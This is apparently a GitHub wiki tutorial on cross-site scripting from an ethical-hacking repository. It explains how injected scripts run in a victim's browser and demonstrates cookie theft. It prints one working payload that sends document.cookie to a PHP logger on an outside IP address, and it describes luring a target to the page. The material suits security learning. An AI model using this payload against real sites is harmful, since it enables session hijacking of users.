11. XSS Attack - tandihansvin/EthicalHacking GitHub Wiki

Cross-site Scripting (XSS) Attack

Cross-site Scripting(XSS) is done by injecting codes to the client-side to execute malicious scripts into a website/web application, the attack is usually performed in the form of a browser-side script and send it to another end user.

How does it work?

In order to perform this kind of attack, the attacker must find a way to inject the payload (let's say it is a javascript) into a webpage that the victim would like to open. Of course, a social engineering will be good techniques to convince the victim to visit the webpage.

In order for an XSS attack to take place, the vulnerable website needs to directly include user input in its pages. An attacker can then insert a string that will be used within the webpage and treated as code by the victim’s browser.

Demonstration

In this demonstration, I'll try to steal a cookie with XSS attack. Usually, a website will have a comment or search part (the page receive user input), and it typically looks like this.

Now we want to exploit this page by injecting a script. Before that, we should make sure that we could run the script by doing script testing.


To keep in mind, the above code is not changing modified the page in the server, unless we injecting the script into an input part that could change the server such as comment, guestbook, etc.


Now, we want to make a page, so when an end user opens that page, we could see get their cookie. First, we need to make a text file to store the cookie. In this example, I made log.txt .

Next, on the server side we should make a php file. So, when it was run, it will write the cookie session into log.txt. I named the file cookieStealer.php. You can get the code from this website

Now, we go back to the vulnerable page (the page that we could perform XSS attack). Then we just need to put this command <script>document.location="http://206.189.43.115/cookieStealer.php?cookie=" + document.cookie;document.location="http://206.189.43.115"</script>. So when someone is open the website, it will redirect the page to execute our cookieStealer.php script and then it will redirect again to main page.

The last thing that we need to do is just send the page to our target. Then, you can see the cookie session on log.txt

⚠️ **GitHub.com Fallback** ⚠️